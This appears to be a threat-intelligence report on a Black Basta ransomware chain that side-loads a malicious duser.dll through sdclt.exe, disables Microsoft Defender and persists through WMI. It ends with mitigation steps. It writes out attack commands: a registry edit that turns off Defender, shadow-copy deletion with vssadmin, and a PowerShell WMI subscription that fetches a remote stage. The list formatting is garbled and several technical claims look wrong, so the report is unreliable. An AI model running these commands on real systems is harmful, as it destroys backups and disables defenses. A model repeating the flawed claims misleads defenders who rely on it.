Executive Summary: In April 2026, researchers at Oracle-42 Intelligence uncovered a sophisticated new attack chain by the Black Basta ransomware group that leverages DLL side-loading to evade Microsoft Defender. This previously undetected technique abuses a legitimate executable, sdclt.exe (Windows Backup and Restore utility), to load a malicious DLL, thereby achieving arbitrary code execution and privilege escalation before disabling security defenses. Unlike prior campaigns, this variant introduces fileless persistence and anti-forensic behaviors, significantly increasing dwell time and operational impact. The flaw—currently unpatched—highlights the urgent need for behavioral detection, privilege hardening, and memory integrity monitoring.
sdclt.exe to load a malicious duser.dll from a non-standard path, bypassing digital signature verification.The campaign begins with a spear-phishing email containing a weaponized ISO file. Once mounted, the ISO contains:
sdclt.exe (legitimate, signed by Microsoft)duser.dll (malicious payload)Invoice_20260401.pdf)When sdclt.exe is executed, Windows searches for duser.dll in the same directory. Because the ISO is mounted to a removable drive (e.g., E:\), Windows prioritizes loading the malicious DLL over the system-resident version. This bypasses driver signature enforcement and code integrity checks, a technique known as "DLL search order hijacking."
The malicious duser.dll injects shellcode into a high-integrity process (e.g., services.exe), granting SYSTEM privileges. This stage is executed within 3–5 seconds of sdclt.exe launch, minimizing behavioral anomalies.
Once elevated, the malware:
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /fMsMpEng.exe, NisSrv.exe)HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management to disable pagefile-based forensicsvssadmin delete shadows /all /quietInstead of writing to disk, Black Basta creates a WMI event subscription:
Command: powershell -nop -ep bypass -c "Register-WmiEvent -Query 'SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'explorer.exe'' -Action {Invoke-WebRequest ...}"
This triggers the next stage payload upon user login, ensuring persistence even after reboots or Defender reinstalls.
The final payload is a stripped-down version of Black Basta, optimized for speed and stealth. It targets mapped network shares and cloud storage using stolen credentials harvested via in-memory dumping (Mimikatz-style). Encryption uses ChaCha20 with an embedded RSA-4096 public key. The ransom note (README.txt) is written directly to disk only after full encryption—minimizing I/O-based detection.
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableThumbnails to 1 and disable autoplay for removable media.HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode and restrict write access to program directories.sdclt.exe spawning from non-standard paths (e.g., AppData\Local\Temp).__InstanceCreationEvent subscriptions.Process Monitor logs and Sysmon Event ID 7 (Image Load).